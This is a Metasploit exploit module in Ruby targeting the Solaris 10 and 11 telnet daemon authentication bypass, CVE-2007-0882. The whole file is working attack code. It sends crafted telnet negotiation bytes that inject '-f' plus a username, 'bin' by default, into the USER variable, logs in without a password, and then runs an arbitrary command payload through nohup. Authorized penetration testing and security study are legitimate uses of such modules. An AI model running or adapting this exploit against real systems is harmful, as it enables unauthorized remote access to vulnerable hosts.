## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super( update_info( info, 'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability', 'Description' => %q{ This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2007-0882' ], [ 'OSVDB', '31881'], [ 'BID', '22512' ] ], 'Privileged' => false, 'Platform' => %w[solaris unix], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 2000, 'BadChars' => '', 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet' } }, 'Targets' => [ ['Automatic', {}], ], 'DisclosureDate' => '2007-02-12', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options([ Opt::RPORT(23), OptString.new('USER', [ true, 'The username to use', 'bin' ]), ]) end def exploit connect print_status('Setting USER environment variable...') req = "\xFF\xFD\x26\xFF\xFB\x26\xFF\xFD\x03\xFF\xFB" req << "\x18\xFF\xFB\x1F\xFF\xFB\x20\xFF\xFB\x21\xFF" req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05" sock.put(req) sock.get_once req << "\xFF\xFC\x25" sock.put(req) sock.get_once req << "\xFF\xFA\x26\x01\x01\x02\xFF\xF0" sock.put(req) sock.get_once req << "\xFF\xFA\x1F\x00\x50\x00\x18\xFF\xF0" sock.put(req) sock.get_once req << "\xFF\xFE\x26\xFF\xFC\x23\xFF\xFC\x24" sock.put(req) sock.get_once req = "\xFF\xFA\x18\x00\x58\x54\x45\x52\x4D\xFF" req << "\xF0\xFF\xFA\x27\x00\x00\x55\x53\x45\x52" req << "\x01\x2D\x66" + datastore['USER'] + "\xFF\xF0" sock.put(req) sock.get_once select(nil, nil, nil, 0.25) sock.put("nohup #{payload.encoded} >/dev/null 2>&1\n") select(nil, nil, nil, 0.25) handler end end